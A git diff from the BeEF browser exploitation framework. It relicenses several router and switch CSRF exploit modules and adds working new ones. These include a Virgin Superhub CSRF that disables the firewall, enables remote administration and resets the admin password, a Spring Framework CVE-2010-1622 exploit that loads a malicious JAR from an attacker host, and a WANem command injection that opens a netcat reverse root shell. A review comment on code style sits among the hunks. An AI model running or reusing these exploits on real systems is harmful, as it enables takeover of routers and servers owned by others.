"License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Dlink_dsl500t_csrf < BeEF::Core::Command 
diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js index a749117a8..db42a848c 100644 --- a/modules/exploits/router/huawei_smartax_mt880/command.js +++ b/modules/exploits/router/huawei_smartax_mt880/command.js @@ -1,25 +1,16 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var gateway = '<%= @base %>'; var username = '<%= @username %>'; var passwd = '<%= @password %>'; var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe(); - huawei_smartax_mt880_iframe.setAttribute('src', gateway+"/Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); + huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); diff --git a/modules/exploits/router/huawei_smartax_mt880/config.yaml b/modules/exploits/router/huawei_smartax_mt880/config.yaml index d12a65130..07ee01588 100644 --- a/modules/exploits/router/huawei_smartax_mt880/config.yaml +++ b/modules/exploits/router/huawei_smartax_mt880/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/huawei_smartax_mt880/module.rb b/modules/exploits/router/huawei_smartax_mt880/module.rb index 77f39ba20..1cda0dcc3 100644 --- a/modules/exploits/router/huawei_smartax_mt880/module.rb +++ b/modules/exploits/router/huawei_smartax_mt880/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Huawei_smartax_mt880_csrf < BeEF::Core::Command 
diff --git a/modules/exploits/router/linksys_befsr41_csrf/command.js b/modules/exploits/router/linksys_befsr41_csrf/command.js index cb7d19eb5..f09e89f23 100644 --- a/modules/exploits/router/linksys_befsr41_csrf/command.js +++ b/modules/exploits/router/linksys_befsr41_csrf/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var befsr41_iframe = beef.dom.createInvisibleIframe(); diff --git a/modules/exploits/router/linksys_befsr41_csrf/config.yaml b/modules/exploits/router/linksys_befsr41_csrf/config.yaml index d3308de95..663e1c058 100644 --- a/modules/exploits/router/linksys_befsr41_csrf/config.yaml +++ b/modules/exploits/router/linksys_befsr41_csrf/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/linksys_befsr41_csrf/module.rb b/modules/exploits/router/linksys_befsr41_csrf/module.rb index 40dcaa4dc..b2e0a6582 100644 --- a/modules/exploits/router/linksys_befsr41_csrf/module.rb +++ b/modules/exploits/router/linksys_befsr41_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Linksys_befsr41_csrf < BeEF::Core::Command 
diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/command.js b/modules/exploits/router/linksys_wrt54g2_csrf/command.js index 0f362bf89..4f76fb710 100644 --- a/modules/exploits/router/linksys_wrt54g2_csrf/command.js +++ b/modules/exploits/router/linksys_wrt54g2_csrf/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var port = '<%= @port %>'; var gateway = '<%= @base %>'; diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml index a64dd89fd..7d8439e5b 100644 --- a/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml +++ b/modules/exploits/router/linksys_wrt54g2_csrf/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/linksys_wrt54g2_csrf/module.rb b/modules/exploits/router/linksys_wrt54g2_csrf/module.rb index 94f5d6ed0..adbce13ac 100644 --- a/modules/exploits/router/linksys_wrt54g2_csrf/module.rb +++ b/modules/exploits/router/linksys_wrt54g2_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Linksys_wrt54g2_csrf < BeEF::Core::Command 
diff --git a/modules/exploits/router/linksys_wrt54g_csrf/command.js b/modules/exploits/router/linksys_wrt54g_csrf/command.js index d18e65898..3959cb0ae 100644 --- a/modules/exploits/router/linksys_wrt54g_csrf/command.js +++ b/modules/exploits/router/linksys_wrt54g_csrf/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var port = '<%= @port %>'; var gateway = '<%= @base %>'; diff --git a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml index 4129d26e1..fe4845565 100644 --- a/modules/exploits/router/linksys_wrt54g_csrf/config.yaml +++ b/modules/exploits/router/linksys_wrt54g_csrf/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/router/linksys_wrt54g_csrf/module.rb b/modules/exploits/router/linksys_wrt54g_csrf/module.rb index 47ee87039..4641c3a31 100644 --- a/modules/exploits/router/linksys_wrt54g_csrf/module.rb +++ b/modules/exploits/router/linksys_wrt54g_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Linksys_wrt54g_csrf < BeEF::Core::Command 
diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js
new file mode 100644
index 000000000..89ab00810
--- /dev/null
+++ b/modules/exploits/router/virgin_superhub_csrf/command.js
@@ -0,0 +1,38 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ var gateway = '<%= @base %>';
+ var passwd = '<%= @password %>';
+ var port = '<%= @port %>';
+
+ var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
+ {'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
+ {'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
+ {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
+ ]);
+
+ var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
+ {'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
+ ]);
+
+ var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
+ {'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
+ {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
+ ]);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(virgin_superhub_iframe1);
+ document.body.removeChild(virgin_superhub_iframe2);
+ document.body.removeChild(virgin_superhub_iframe3);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml
new file mode 100644
index 000000000..b4016b540
--- /dev/null
+++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ virgin_superhub_csrf:
+ enable: true
+ category: ["Exploits", "Router"]
+ name: "Virgin Superhub CSRF"
+ description: "Attempts to enable remote administration, disable the firewall, and change the admin password on a Virgin Superhub router."
+ authors: ["bcoles", "n0x00"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb
new file mode 100644
index 000000000..c815843ac
--- /dev/null
+++ b/modules/exploits/router/virgin_superhub_csrf/module.rb
@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Virgin_superhub_csrf < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.1/'},
+ {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'},
+ {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/safari_launch_app/command.js b/modules/exploits/safari_launch_app/command.js
deleted file mode 100755
index 91970c842..000000000
--- a/modules/exploits/safari_launch_app/command.js
+++ /dev/null
@@ -1,23 +0,0 @@
-//
-// Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-//
-beef.execute(function() {
- var baseTag = document.createElement('base');
- baseTag.setAttribute('id', 'sla_<%= @command_id %>');
- baseTag.setAttribute('href', 'file://');
- document.head.appendChild(baseTag);
- setTimeout('document.location="<%= @app_path %>";beef.net.send("<%= @command_url %>", <%= @command_id %>, "Command [<%= @app_path %>] launched");', 1000);
- setTimeout('document.head.removeChild(document.getElementById("sla_<%= @command_id %>"));beef.net.send("<%= @command_url %>", <%= @command_id %>, "Base tag removed");', 1000);
-});
diff --git a/modules/exploits/safari_launch_app/module.rb b/modules/exploits/safari_launch_app/module.rb
deleted file mode 100755
index 50eb85b4a..000000000
--- a/modules/exploits/safari_launch_app/module.rb
+++ /dev/null
@@ -1,24 +0,0 @@
-#
-# Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-class Safari_launch_app < BeEF::Core::Command
-
- def self.options
- return [
- {'name'=>'app_path', 'ui_label' => 'Application', 'value' => '/usr/sbin/netstat'},
- ]
- end
-
-end
diff --git a/modules/exploits/spring_framework_malicious_jar/command.js b/modules/exploits/spring_framework_malicious_jar/command.js
new file mode 100644
index 000000000..cf4e73799
--- /dev/null
+++ b/modules/exploits/spring_framework_malicious_jar/command.js
@@ -0,0 +1,23 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+ jar_file = "<%= @jar_file %>";
+ form_controller = "<%= @form_controller %>";
+
+ uri = form_controller+"?class.classLoader.URLs[0]=jar:"+jar_file;
+ var spring_iframe = beef.dom.createInvisibleIframe();
+ spring_iframe.setAttribute('src', uri);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(spring_iframe);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
diff --git a/modules/exploits/spring_framework_malicious_jar/config.yaml b/modules/exploits/spring_framework_malicious_jar/config.yaml
new file mode 100644
index 000000000..c47fe917d
--- /dev/null
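Review bot: In the new `spring_framework_malicious_jar/command.js`, `jar_file`, `form_controller`, `uri` and `cleanup` are assigned without `var`, so they become properties of the page's global object, and `setTimeout("cleanup()", 15000)` then looks `cleanup` up by name when the timer fires. The `wanem_command_execution` and `zenoss_3x_command_execution` command files added in this commit assign the same global `cleanup`, so when two of these modules run within 15 seconds the later assignment replaces the earlier one: one iframe is never removed and the second timer calls `removeChild` on a node that is already detached. Declaring the locals with `var` and passing a closure, `setTimeout(function() { document.body.removeChild(spring_iframe); }, 15000);`, keeps each module's state inside its own `beef.execute` callback and avoids the string-evaluated timer.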
+++ b/modules/exploits/spring_framework_malicious_jar/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + spring_framework_malicious_jar: + enable: true + category: "Exploits" + name: "Spring Framework Malicious Jar Exploit" + description: "Execute a malicious JAR file using the Spring Framework 'class.classloader' vulnerability (CVE-2010-1622).
Specify the URL for a form controller on the target and the URL for your malicious JAR file.
For more information see: http://www.exploit-db.com/exploits/13918/

Versions Affected:
3.0.0 to 3.0.2
2.5.0 to 2.5.6.SEC01 (community releases)
2.5.0 to 2.5.7 (subscription customers)" + authors: ["bcoles"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/spring_framework_malicious_jar/module.rb b/modules/exploits/spring_framework_malicious_jar/module.rb new file mode 100644 index 000000000..81fb3e9c8 --- /dev/null +++ b/modules/exploits/spring_framework_malicious_jar/module.rb @@ -0,0 +1,19 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Spring_framework_malicious_jar < BeEF::Core::Command + + def self.options + return [ + {'name' => 'form_controller', 'ui_label' => 'Form Controller URL', 'value' => 'http://target/path/to/form/controller'}, + {'name' => 'jar_file', 'ui_label' => 'Malicious JAR file URL', 'value' => 'http://attacker/path/to/attack.jar!/'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/switch/netgear_gs108t_csrf/command.js b/modules/exploits/switch/netgear_gs108t_csrf/command.js index a2f13c118..d812993dc 100644 --- a/modules/exploits/switch/netgear_gs108t_csrf/command.js +++ b/modules/exploits/switch/netgear_gs108t_csrf/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var base = '<%= @base %>'; var oldpassword = '<%= @oldpassword %>'; diff --git a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml index 6402686d4..6d363e279 100644 --- a/modules/exploits/switch/netgear_gs108t_csrf/config.yaml +++ b/modules/exploits/switch/netgear_gs108t_csrf/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/switch/netgear_gs108t_csrf/module.rb b/modules/exploits/switch/netgear_gs108t_csrf/module.rb index e4ca0a105..0dda11a2b 100644 --- a/modules/exploits/switch/netgear_gs108t_csrf/module.rb +++ b/modules/exploits/switch/netgear_gs108t_csrf/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Netgear_gs108t_csrf < BeEF::Core::Command 
diff --git a/modules/exploits/vtiger_crm_upload_exploit/command.js b/modules/exploits/vtiger_crm_upload_exploit/command.js index f95758eb6..4702ad6df 100644 --- a/modules/exploits/vtiger_crm_upload_exploit/command.js +++ b/modules/exploits/vtiger_crm_upload_exploit/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + // VtigerCRM <= 5.0.4 "chained exploitation" PoC // Hacked up for OWASP New Zealand Day, July 13th 2009 // diff --git a/modules/exploits/vtiger_crm_upload_exploit/config.yaml b/modules/exploits/vtiger_crm_upload_exploit/config.yaml index 1f10055aa..470e0f742 100644 --- a/modules/exploits/vtiger_crm_upload_exploit/config.yaml +++ b/modules/exploits/vtiger_crm_upload_exploit/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/exploits/vtiger_crm_upload_exploit/module.rb b/modules/exploits/vtiger_crm_upload_exploit/module.rb index ad2d6f0bc..16483715b 100644 --- a/modules/exploits/vtiger_crm_upload_exploit/module.rb +++ b/modules/exploits/vtiger_crm_upload_exploit/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Vtiger_crm_upload_exploit < BeEF::Core::Command 
diff --git a/modules/exploits/wanem_command_execution/command.js b/modules/exploits/wanem_command_execution/command.js new file mode 100644 index 000000000..7f6fe06e6 --- /dev/null +++ b/modules/exploits/wanem_command_execution/command.js @@ -0,0 +1,24 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var lhost = '<%= @lhost %>'; + var lport = '<%= @lport %>'; + + var wanem_iframe = beef.dom.createInvisibleIframe(); + wanem_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/WANem/result.php?pc=127.0.0.1;/UNIONFS/home/perc/dosu%20{nc,'+lhost+','+lport+',-e,/bin/sh}%26'); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(wanem_iframe); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/wanem_command_execution/config.yaml b/modules/exploits/wanem_command_execution/config.yaml new file mode 100644 index 000000000..42660a410 --- /dev/null +++ b/modules/exploits/wanem_command_execution/config.yaml @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +################################################################################ +# For more information see: http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/ +################################################################################ +beef: + module: + wanem_command_execution: + enable: true + category: "Exploits" + name: "WAN Emulator Command Execution" + description: "Attempts to get a reverse root shell on a WAN Emulator server.
